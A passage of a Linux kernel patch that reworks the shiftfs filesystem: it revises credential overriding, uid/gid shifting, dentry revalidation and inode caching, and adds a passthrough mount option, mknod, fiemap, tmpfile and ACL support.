file *realfile; -+}; -+ -+struct kmem_cache *shiftfs_file_info_cache; -+ -+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino, -+ umode_t mode, dev_t dev, struct dentry *dentry); -+ -+#define SHIFTFS_PASSTHROUGH_NONE 0 -+#define SHIFTFS_PASSTHROUGH_STAT 1 -+#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT) -+ -+static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info) -+{ -+ if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT)) -+ return false; -+ -+ if (info->info_mark && -+ !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT)) -+ return false; -+ -+ return true; -+} - - enum { - OPT_MARK, -+ OPT_PASSTHROUGH, - OPT_LAST, - }; - - /* global filesystem options */ - static const match_table_t tokens = { - { OPT_MARK, "mark" }, -+ { OPT_PASSTHROUGH, "passthrough=%u" }, - { OPT_LAST, NULL } - }; - 
--static const struct cred *shiftfs_get_up_creds(struct super_block *sb) -+static const struct cred *shiftfs_override_creds(const struct super_block *sb) - { -- struct shiftfs_super_info *ssi = sb->s_fs_info; -- struct cred *cred = prepare_creds(); -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; - -- if (!cred) -- return NULL; -+ return override_creds(sbinfo->creator_cred); -+} -+ -+static inline void shiftfs_revert_object_creds(const struct cred *oldcred, -+ struct cred *newcred) -+{ -+ revert_creds(oldcred); -+ put_cred(newcred); -+} -+ -+static int shiftfs_override_object_creds(const struct super_block *sb, -+ const struct cred **oldcred, -+ struct cred **newcred, -+ struct dentry *dentry, umode_t mode, -+ bool hardlink) -+{ -+ kuid_t fsuid = current_fsuid(); -+ kgid_t fsgid = current_fsgid(); -+ -+ *oldcred = shiftfs_override_creds(sb); -+ -+ *newcred = prepare_creds(); -+ if (!*newcred) { -+ revert_creds(*oldcred); -+ return -ENOMEM; -+ } -+ -+ (*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid)); -+ (*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid)); -+ -+ if (!hardlink) { -+ int err = security_dentry_create_files_as(dentry, mode, -+ &dentry->d_name, -+ *oldcred, *newcred); -+ if (err) { -+ shiftfs_revert_object_creds(*oldcred, *newcred); -+ return err; -+ } -+ } - -- cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid)); -- cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid)); -- put_user_ns(cred->user_ns); -- cred->user_ns = get_user_ns(ssi->userns); -+ put_cred(override_creds(*newcred)); -+ return 0; -+} - -- return cred; -+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to, -+ kuid_t kuid) -+{ -+ uid_t uid = from_kuid(from, kuid); -+ return make_kuid(to, uid); - } - --static const struct cred *shiftfs_new_creds(const struct cred **newcred, -- struct super_block *sb) -+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to, -+ kgid_t kgid) - { -- const 
struct cred *cred = shiftfs_get_up_creds(sb); -+ gid_t gid = from_kgid(from, kgid); -+ return make_kgid(to, gid); -+} - -- *newcred = cred; -+static void shiftfs_copyattr(struct inode *from, struct inode *to) -+{ -+ struct user_namespace *from_ns = from->i_sb->s_user_ns; -+ struct user_namespace *to_ns = to->i_sb->s_user_ns; -+ -+ to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid); -+ to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid); -+ to->i_mode = from->i_mode; -+ to->i_atime = from->i_atime; -+ to->i_mtime = from->i_mtime; -+ to->i_ctime = from->i_ctime; -+ i_size_write(to, i_size_read(from)); -+} - -- if (cred) -- cred = override_creds(cred); -- else -- printk(KERN_ERR "shiftfs: Credential override failed: no memory\n"); -+static void shiftfs_copyflags(struct inode *from, struct inode *to) -+{ -+ unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME; - -- return cred; -+ inode_set_flags(to, from->i_flags & mask, mask); - } - --static void shiftfs_old_creds(const struct cred *oldcred, -- const struct cred **newcred) -+static void shiftfs_file_accessed(struct file *file) - { -- if (!*newcred) -+ struct inode *upperi, *loweri; -+ -+ if (file->f_flags & O_NOATIME) - return; - -- revert_creds(oldcred); -- put_cred(*newcred); -+ upperi = file_inode(file); -+ loweri = upperi->i_private; -+ -+ if (!loweri) -+ return; -+ -+ upperi->i_mtime = loweri->i_mtime; -+ upperi->i_ctime = loweri->i_ctime; -+ -+ touch_atime(&file->f_path); - } - --static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options) -+static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo, -+ char *options) - { - char *p; - substring_t args[MAX_OPT_ARGS]; - -- ssi->mark = false; -+ sbinfo->mark = false; -+ sbinfo->passthrough = 0; - - while ((p = strsep(&options, ",")) != NULL) { -- int token; -+ int err, intarg, token; - - if (!*p) - continue; -@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options) - token = 
match_token(p, tokens, args); - switch (token) { - case OPT_MARK: -- ssi->mark = true; -+ sbinfo->mark = true; -+ break; -+ case OPT_PASSTHROUGH: -+ err = match_int(&args[0], &intarg); -+ if (err) -+ return err; -+ -+ if (intarg & ~SHIFTFS_PASSTHROUGH_ALL) -+ return -EINVAL; -+ -+ sbinfo->passthrough = intarg; - break; - default: - return -EINVAL; - } - } -+ - return 0; - } - - static void shiftfs_d_release(struct dentry *dentry) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; - -- dput(real); -+ if (lowerd) -+ dput(lowerd); - } - - static struct dentry *shiftfs_d_real(struct dentry *dentry, - const struct inode *inode) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; -+ -+ if (inode && d_inode(dentry) == inode) -+ return dentry; - -- if (unlikely(real->d_flags & DCACHE_OP_REAL)) -- return real->d_op->d_real(real, real->d_inode); -+ lowerd = d_real(lowerd, inode); -+ if (lowerd && (!inode || inode == d_inode(lowerd))) -+ return lowerd; - -- return real; -+ WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry, -+ inode ? inode->i_sb->s_id : "NULL", inode ? 
inode->i_ino : 0); -+ return dentry; - } - - static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags) - { -- struct dentry *real = dentry->d_fsdata; -+ int err = 1; -+ struct dentry *lowerd = dentry->d_fsdata; - -- if (d_unhashed(real)) -+ if (d_is_negative(lowerd) != d_is_negative(dentry)) - return 0; - -- if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE)) -- return 1; -+ if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE)) -+ err = lowerd->d_op->d_weak_revalidate(lowerd, flags); - -- return real->d_op->d_weak_revalidate(real, flags); -+ if (d_really_is_positive(dentry)) { -+ struct inode *inode = d_inode(dentry); -+ struct inode *loweri = d_inode(lowerd); -+ -+ shiftfs_copyattr(loweri, inode); -+ if (!inode->i_nlink) -+ err = 0; -+ } -+ -+ return err; - } - - static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags) - { -- struct dentry *real = dentry->d_fsdata; -- int ret; -+ int err = 1; -+ struct dentry *lowerd = dentry->d_fsdata; - -- if (d_unhashed(real)) -+ if (d_unhashed(lowerd) || -+ ((d_is_negative(lowerd) != d_is_negative(dentry)))) - return 0; - -- /* -- * inode state of underlying changed from positive to negative -- * or vice versa; force a lookup to update our view -- */ -- if (d_is_negative(real) != d_is_negative(dentry)) -- return 0; -+ if (flags & LOOKUP_RCU) -+ return -ECHILD; - -- if (!(real->d_flags & DCACHE_OP_REVALIDATE)) -- return 1; -+ if ((lowerd->d_flags & DCACHE_OP_REVALIDATE)) -+ err = lowerd->d_op->d_revalidate(lowerd, flags); - -- ret = real->d_op->d_revalidate(real, flags); -+ if (d_really_is_positive(dentry)) { -+ struct inode *inode = d_inode(dentry); -+ struct inode *loweri = d_inode(lowerd); - -- if (ret == 0 && !(flags & LOOKUP_RCU)) -- d_invalidate(real); -+ shiftfs_copyattr(loweri, inode); -+ if (!inode->i_nlink) -+ err = 0; -+ } - -- return ret; -+ return err; - } - - static const struct dentry_operations shiftfs_dentry_ops = { -- .d_release = shiftfs_d_release, -- .d_real = 
shiftfs_d_real, -- .d_revalidate = shiftfs_d_revalidate, -+ .d_release = shiftfs_d_release, -+ .d_real = shiftfs_d_real, -+ .d_revalidate = shiftfs_d_revalidate, - .d_weak_revalidate = shiftfs_d_weak_revalidate, - }; - --static int shiftfs_readlink(struct dentry *dentry, char __user *data, -- int flags) --{ -- struct dentry *real = dentry->d_fsdata; -- const struct inode_operations *iop = real->d_inode->i_op; -- -- if (iop->readlink) -- return iop->readlink(real, data, flags); -- -- return -EINVAL; --} -- - static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode, - struct delayed_call *done) - { -- if (dentry) { -- struct dentry *real = dentry->d_fsdata; -- struct inode *reali = real->d_inode; -- const struct inode_operations *iop = reali->i_op; -- const char *res = ERR_PTR(-EPERM); -- -- if (iop->get_link) -- res = iop->get_link(real, reali, done); -+ const char *p; -+ const struct cred *oldcred; -+ struct dentry *lowerd; - -- return res; -- } else { -- /* RCU lookup not supported */ -+ /* RCU lookup not supported */ -+ if (!dentry) - return ERR_PTR(-ECHILD); -- } -+ -+ lowerd = dentry->d_fsdata; -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ p = vfs_get_link(lowerd, done); -+ revert_creds(oldcred); -+ -+ return p; - } - - static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, - const char *name, const void *value, - size_t size, int flags) - { -- struct dentry *real = dentry->d_fsdata; -- int err = -EOPNOTSUPP; -- const struct cred *oldcred, *newcred; -+ struct dentry *lowerd = dentry->d_fsdata; -+ int err; -+ const struct cred *oldcred; -+ -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = vfs_setxattr(lowerd, name, value, size, flags); -+ revert_creds(oldcred); - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- err = vfs_setxattr(real, name, value, size, flags); -- shiftfs_old_creds(oldcred, &newcred); -+ shiftfs_copyattr(lowerd->d_inode, inode); - - return err; - } -@@ -214,13 +330,13 @@ static 
int shiftfs_xattr_get(const struct xattr_handler *handler, - struct dentry *dentry, struct inode *inode, - const char *name, void *value, size_t size) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; - int err; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- err = vfs_getxattr(real, name, value, size); -- shiftfs_old_creds(oldcred, &newcred); -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = vfs_getxattr(lowerd, name, value, size); -+ revert_creds(oldcred); - - return err; - } -@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler, - static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list, - size_t size) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; - int err; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- err = vfs_listxattr(real, list, size); -- shiftfs_old_creds(oldcred, &newcred); -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = vfs_listxattr(lowerd, list, size); -+ revert_creds(oldcred); - - return err; - } - - static int shiftfs_removexattr(struct dentry *dentry, const char *name) - { -- struct dentry *real = dentry->d_fsdata; -+ struct dentry *lowerd = dentry->d_fsdata; - int err; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; -+ -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = vfs_removexattr(lowerd, name); -+ revert_creds(oldcred); - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- err = vfs_removexattr(real, name); -- shiftfs_old_creds(oldcred, &newcred); -+ /* update c/mtime */ -+ shiftfs_copyattr(lowerd->d_inode, d_inode(dentry)); - - return err; - } -@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler, - return shiftfs_setxattr(dentry, inode, name, 
value, size, flags); - } - --static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry) -+static int shiftfs_inode_test(struct inode *inode, void *data) - { -- struct inode *reali; -- -- if (!dentry) -- return; -- -- reali = dentry->d_inode; -- -- if (!reali->i_op->get_link) -- inode->i_opflags |= IOP_NOFOLLOW; -+ return inode->i_private == data; -+} - -- inode->i_mapping = reali->i_mapping; -- inode->i_private = dentry; -+static int shiftfs_inode_set(struct inode *inode, void *data) -+{ -+ inode->i_private = data; -+ return 0; - } - --static int shiftfs_make_object(struct inode *dir, struct dentry *dentry, -- umode_t mode, const char *symlink, -- struct dentry *hardlink, bool excl) -+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, -+ umode_t mode, const char *symlink, -+ struct dentry *hardlink, bool excl) - { -- struct dentry *real = dir->i_private, *new = dentry->d_fsdata; -- struct inode *reali = real->d_inode, *newi; -- const struct inode_operations *iop = reali->i_op; - int err; -- const struct cred *oldcred, *newcred; -- bool op_ok = false; -+ const struct cred *oldcred; -+ struct cred *newcred; -+ void *loweri_iop_ptr = NULL; -+ umode_t modei = mode; -+ struct super_block *dir_sb = diri->i_sb; -+ struct dentry *lowerd_new = dentry->d_fsdata; -+ struct inode *inode = NULL, *loweri_dir = diri->i_private; -+ const struct inode_operations *loweri_dir_iop = loweri_dir->i_op; -+ struct dentry *lowerd_link = NULL; - - if (hardlink) { -- op_ok = iop->link; -+ loweri_iop_ptr = loweri_dir_iop->link; - } else { - switch (mode & S_IFMT) { - case S_IFDIR: -- op_ok = iop->mkdir; -+ loweri_iop_ptr = loweri_dir_iop->mkdir; - break; - case S_IFREG: -- op_ok = iop->create; -+ loweri_iop_ptr = loweri_dir_iop->create; - break; - case S_IFLNK: -- op_ok = iop->symlink; -+ loweri_iop_ptr = loweri_dir_iop->symlink; -+ break; -+ case S_IFSOCK: -+ /* fall through */ -+ case S_IFIFO: -+ loweri_iop_ptr = loweri_dir_iop->mknod; -+ break; - } 
- } -- if (!op_ok) -- return -EINVAL; -+ if (!loweri_iop_ptr) { -+ err = -EINVAL; -+ goto out_iput; -+ } - -+ inode_lock_nested(loweri_dir, I_MUTEX_PARENT); - -- newi = shiftfs_new_inode(dentry->d_sb, mode, NULL); -- if (!newi) -- return -ENOMEM; -+ if (!hardlink) { -+ inode = new_inode(dir_sb); -+ if (!inode) { -+ err = -ENOMEM; -+ goto out_iput; -+ } -+ -+ /* -+ * new_inode() will have added the new inode to the super -+ * block's list of inodes. Further below we will call -+ * inode_insert5() Which would perform the same operation again -+ * thereby corrupting the list. To avoid this raise I_CREATING -+ * in i_state which will cause inode_insert5() to skip this -+ * step. I_CREATING will be cleared by d_instantiate_new() -+ * below. -+ */ -+ spin_lock(&inode->i_lock); -+ inode->i_state |= I_CREATING; -+ spin_unlock(&inode->i_lock); - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ inode_init_owner(inode, diri, mode); -+ modei = inode->i_mode; -+ } - -- inode_lock_nested(reali, I_MUTEX_PARENT); -+ err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred, -+ dentry, modei, hardlink != NULL); -+ if (err) -+ goto out_iput; - -- err = -EINVAL; /* shut gcc up about uninit var */ - if (hardlink) { -- struct dentry *realhardlink = hardlink->d_fsdata; -- -- err = vfs_link(realhardlink, reali, new, NULL); -+ lowerd_link = hardlink->d_fsdata; -+ err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL); - } else { -- switch (mode & S_IFMT) { -+ switch (modei & S_IFMT) { - case S_IFDIR: -- err = vfs_mkdir(reali, new, mode); -+ err = vfs_mkdir(loweri_dir, lowerd_new, modei); - break; - case S_IFREG: -- err = vfs_create(reali, new, mode, excl); -+ err = vfs_create(loweri_dir, lowerd_new, modei, excl); - break; - case S_IFLNK: -- err = vfs_symlink(reali, new, symlink); -+ err = vfs_symlink(loweri_dir, lowerd_new, symlink); -+ break; -+ case S_IFSOCK: -+ /* fall through */ -+ case S_IFIFO: -+ err = vfs_mknod(loweri_dir, lowerd_new, modei, 0); -+ break; -+ 
default: -+ err = -EINVAL; -+ break; - } - } - -- shiftfs_old_creds(oldcred, &newcred); -+ shiftfs_revert_object_creds(oldcred, newcred); - -+ if (!err && WARN_ON(!lowerd_new->d_inode)) -+ err = -EIO; - if (err) -- goto out_dput; -+ goto out_iput; -+ -+ if (hardlink) { -+ inode = d_inode(hardlink); -+ ihold(inode); -+ -+ /* copy up times from lower inode */ -+ shiftfs_copyattr(d_inode(lowerd_link), inode); -+ set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink); -+ d_instantiate(dentry, inode); -+ } else { -+ struct inode *inode_tmp; -+ struct inode *loweri_new = d_inode(lowerd_new); -+ -+ inode_tmp = inode_insert5(inode, (unsigned long)loweri_new, -+ shiftfs_inode_test, shiftfs_inode_set, -+ loweri_new); -+ if (unlikely(inode_tmp != inode)) { -+ pr_err_ratelimited("shiftfs: newly created inode found in cache\n"); -+ iput(inode_tmp); -+ err = -EINVAL; -+ goto out_iput; -+ } - -- shiftfs_fill_inode(newi, new); -+ ihold(loweri_new); -+ shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode, -+ 0, lowerd_new); -+ d_instantiate_new(dentry, inode); -+ } - -- d_instantiate(dentry, newi); -+ shiftfs_copyattr(loweri_dir, diri); -+ if (loweri_iop_ptr == loweri_dir_iop->mkdir) -+ set_nlink(diri, loweri_dir->i_nlink); - -- new = NULL; -- newi = NULL; -+ inode = NULL; - -- out_dput: -- dput(new); -- iput(newi); -- inode_unlock(reali); -+out_iput: -+ iput(inode); -+ inode_unlock(loweri_dir); - - return err; - } -@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry, - { - mode |= S_IFREG; - -- return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl); -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl); - } - - static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry, -@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry, - { - mode |= S_IFDIR; - -- return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(dir, dentry, mode, 
NULL, NULL, false); - } - - static int shiftfs_link(struct dentry *hardlink, struct inode *dir, - struct dentry *dentry) - { -- return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false); -+ return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false); -+} -+ -+static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, -+ dev_t rdev) -+{ -+ if (!S_ISFIFO(mode) && !S_ISSOCK(mode)) -+ return -EPERM; -+ -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); - } - - static int shiftfs_symlink(struct inode *dir, struct dentry *dentry, - const char *symlink) - { -- return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false); -+ return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false); - } - - static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - { -- struct dentry *real = dir->i_private, *new = dentry->d_fsdata; -- struct inode *reali = real->d_inode; -+ struct dentry *lowerd = dentry->d_fsdata; -+ struct inode *loweri = dir->i_private; - int err; -- const struct cred *oldcred, *newcred; -- -- inode_lock_nested(reali, I_MUTEX_PARENT); -- -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ const struct cred *oldcred; - -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ inode_lock_nested(loweri, I_MUTEX_PARENT); - if (rmdir) -- err = vfs_rmdir(reali, new); -+ err = vfs_rmdir(loweri, lowerd); - else -- err = vfs_unlink(reali, new, NULL); -+ err = vfs_unlink(loweri, lowerd, NULL); -+ inode_unlock(loweri); -+ revert_creds(oldcred); - -- shiftfs_old_creds(oldcred, &newcred); -- inode_unlock(reali); -+ shiftfs_copyattr(loweri, dir); -+ set_nlink(d_inode(dentry), loweri->i_nlink); -+ if (!err) -+ d_drop(dentry); -+ -+ set_nlink(dir, loweri->i_nlink); - - return err; - } -@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old, - struct inode *newdir, struct dentry *new, - unsigned int flags) - { -- struct dentry *rodd = 
olddir->i_private, *rndd = newdir->i_private, -- *realold = old->d_fsdata, -- *realnew = new->d_fsdata, *trap; -- struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode; -+ struct dentry *lowerd_dir_old = old->d_parent->d_fsdata, -+ *lowerd_dir_new = new->d_parent->d_fsdata, -+ *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata, -+ *trapd; -+ struct inode *loweri_dir_old = lowerd_dir_old->d_inode, -+ *loweri_dir_new = lowerd_dir_new->d_inode; - int err = -EINVAL; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; - -- trap = lock_rename(rndd, rodd); -+ trapd = lock_rename(lowerd_dir_new, lowerd_dir_old); - -- if (trap == realold || trap == realnew) -+ if (trapd == lowerd_old || trapd == lowerd_new) - goto out_unlock; - -- oldcred = shiftfs_new_creds(&newcred, old->d_sb); -- -- err = vfs_rename(realolddir, realold, realnewdir, -- realnew, NULL, flags); -+ oldcred = shiftfs_override_creds(old->d_sb); -+ err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new, -+ NULL, flags); -+ revert_creds(oldcred); - -- shiftfs_old_creds(oldcred, &newcred); -+ shiftfs_copyattr(loweri_dir_old, olddir); -+ shiftfs_copyattr(loweri_dir_new, newdir); - -- out_unlock: -- unlock_rename(rndd, rodd); -+out_unlock: -+ unlock_rename(lowerd_dir_new, lowerd_dir_old); - - return err; - } -@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old, - static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry, - unsigned int flags) - { -- struct dentry *real = dir->i_private, *new; -- struct inode *reali = real->d_inode, *newi; -- const struct cred *oldcred, *newcred; -- -- inode_lock(reali); -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len); -- shiftfs_old_creds(oldcred, &newcred); -- inode_unlock(reali); -+ struct dentry *new; -+ struct inode *newi; -+ const struct cred *oldcred; -+ struct dentry *lowerd = 
dentry->d_parent->d_fsdata; -+ struct inode *inode = NULL, *loweri = lowerd->d_inode; -+ -+ inode_lock(loweri); -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len); -+ revert_creds(oldcred); -+ inode_unlock(loweri); - - if (IS_ERR(new)) - return new; - - dentry->d_fsdata = new; - -- newi = NULL; -- if (!new->d_inode) -+ newi = new->d_inode; -+ if (!newi) - goto out; - -- newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new); -- if (!newi) { -+ inode = iget5_locked(dentry->d_sb, (unsigned long)newi, -+ shiftfs_inode_test, shiftfs_inode_set, newi); -+ if (!inode) { - dput(new); - return ERR_PTR(-ENOMEM); - } -+ if (inode->i_state & I_NEW) { -+ /* -+ * inode->i_private set by shiftfs_inode_set(), but we still -+ * need to take a reference -+ */ -+ ihold(newi); -+ shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new); -+ unlock_new_inode(inode); -+ } - -- out: -- return d_splice_alias(newi, dentry); -+out: -+ return d_splice_alias(inode, dentry); - } - - static int shiftfs_permission(struct inode *inode, int mask) - { -- struct dentry *real = inode->i_private; -- struct inode *reali = real->d_inode; -- const struct inode_operations *iop = reali->i_op; - int err; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; -+ struct inode *loweri = inode->i_private; - -- if (mask & MAY_NOT_BLOCK) -+ if (!loweri) { -+ WARN_ON(!(mask & MAY_NOT_BLOCK)); - return -ECHILD; -+ } - -- oldcred = shiftfs_new_creds(&newcred, inode->i_sb); -- if (iop->permission) -- err = iop->permission(reali, mask); -- else -- err = generic_permission(reali, mask); -- shiftfs_old_creds(oldcred, &newcred); -+ err = generic_permission(inode, mask); -+ if (err) -+ return err; -+ -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ err = inode_permission(loweri, mask); -+ revert_creds(oldcred); -+ -+ return err; -+} -+ -+static int shiftfs_fiemap(struct inode *inode, -+ struct fiemap_extent_info 
*fieinfo, u64 start, -+ u64 len) -+{ -+ int err; -+ const struct cred *oldcred; -+ struct inode *loweri = inode->i_private; -+ -+ if (!loweri->i_op->fiemap) -+ return -EOPNOTSUPP; -+ -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC) -+ filemap_write_and_wait(loweri->i_mapping); -+ err = loweri->i_op->fiemap(loweri, fieinfo, start, len); -+ revert_creds(oldcred); -+ -+ return err; -+} -+ -+static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry, -+ umode_t mode) -+{ -+ int err; -+ const struct cred *oldcred; -+ struct dentry *lowerd = dentry->d_fsdata; -+ struct inode *loweri = dir->i_private; -+ -+ if (!loweri->i_op->tmpfile) -+ return -EOPNOTSUPP; -+ -+ oldcred = shiftfs_override_creds(dir->i_sb); -+ err = loweri->i_op->tmpfile(loweri, lowerd, mode); -+ revert_creds(oldcred); - - return err; - } - - static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - { -- struct dentry *real = dentry->d_fsdata; -- struct inode *reali = real->d_inode; -- const struct inode_operations *iop = reali->i_op; -+ struct dentry *lowerd = dentry->d_fsdata; -+ struct inode *loweri = lowerd->d_inode; - struct iattr newattr = *attr; -- const struct cred *oldcred, *newcred; -+ const struct cred *oldcred; - struct super_block *sb = dentry->d_sb; - int err; - -+ err = setattr_prepare(dentry, attr); -+ if (err) -+ return err; -+ - newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid)); - newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid)); - -- oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -- inode_lock(reali); -- if (iop->setattr) -- err = iop->setattr(real, &newattr); -- else -- err = simple_setattr(real, &newattr); -- inode_unlock(reali); -- shiftfs_old_creds(oldcred, &newcred); -+ inode_lock(loweri); -+ oldcred = shiftfs_override_creds(dentry->d_sb); -+ err = notify_change(lowerd, attr, NULL); -+ revert_creds(oldcred); -+ inode_unlock(loweri); - -- if (err) -- return err; -+ 
shiftfs_copyattr(loweri, d_inode(dentry)); - -- /* all OK, reflect the change on our inode */ -- setattr_copy(d_inode(dentry), attr); -- return 0; -+ return err; - } - - static int shiftfs_getattr(const struct path *path, struct kstat *stat, - u32 request_mask, unsigned int query_flags) - { - struct inode *inode = path->dentry->d_inode; -- struct dentry *real = path->dentry->d_fsdata; -- struct inode *reali = real->d_inode; -- const struct inode_operations *iop = reali->i_op; -- struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real }; -- int err = 0; -- -- if (iop->getattr) -- err = iop->getattr(&newpath, stat, request_mask, query_flags); -- else -- generic_fillattr(reali, stat); -+ struct dentry *lowerd = path->dentry->d_fsdata; -+ struct inode *loweri = lowerd->d_inode; -+ struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info; -+ struct path newpath = { .mnt = info->mnt, .dentry = lowerd }; -+ struct user_namespace *from_ns = loweri->i_sb->s_user_ns; -+ struct user_namespace *to_ns = inode->i_sb->s_user_ns; -+ const struct cred *oldcred; -+ int err; -+ -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ err = vfs_getattr(&newpath, stat, request_mask, query_flags); -+ revert_creds(oldcred); - - if (err) - return err; - - /* transform the underlying id */ -- stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid)); -- stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid)); -+ stat->uid = shift_kuid(from_ns, to_ns, stat->uid); -+ stat->gid = shift_kgid(from_ns, to_ns, stat->gid); - return 0; - } - --static const struct inode_operations shiftfs_inode_ops = { -- .lookup = shiftfs_lookup, -- .getattr = shiftfs_getattr, -- .setattr = shiftfs_setattr, -- .permission = shiftfs_permission, -- .mkdir = shiftfs_mkdir, -- .symlink = shiftfs_symlink, -- .get_link = shiftfs_get_link, -- .readlink = shiftfs_readlink, -- .unlink = shiftfs_unlink, -- .rmdir = shiftfs_rmdir, -- .rename = shiftfs_rename, -- .link = 
shiftfs_link, -- .create = shiftfs_create, -- .mknod = NULL, /* no special files currently */ -- .listxattr = shiftfs_listxattr, --}; -+#ifdef CONFIG_SHIFT_FS_POSIX_ACL - --static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode, -- struct dentry *dentry) -+static int -+shift_acl_ids(struct user_namespace *from, struct user_namespace *to, -+ struct posix_acl *acl) - { -- struct inode *inode; -- -- inode = new_inode(sb); -- if (!inode) -- return NULL; -- -- /* -- * our inode is completely vestigial. All lookups, getattr -- * and permission checks are done on the underlying inode, so -- * what the user sees is entirely from the underlying inode. -- */ -- mode &= S_IFMT; -+ int i; -+ -+ for (i = 0; i < acl->a_count; i++) { -+ struct posix_acl_entry *e = &acl->a_entries[i]; -+ switch(e->e_tag) { -+ case ACL_USER: -+ e->e_uid = shift_kuid(from, to, e->e_uid); -+ if (!uid_valid(e->e_uid)) -+ return -EOVERFLOW; -+ break; -+ case ACL_GROUP: -+ e->e_gid = shift_kgid(from, to, e->e_gid); -+ if 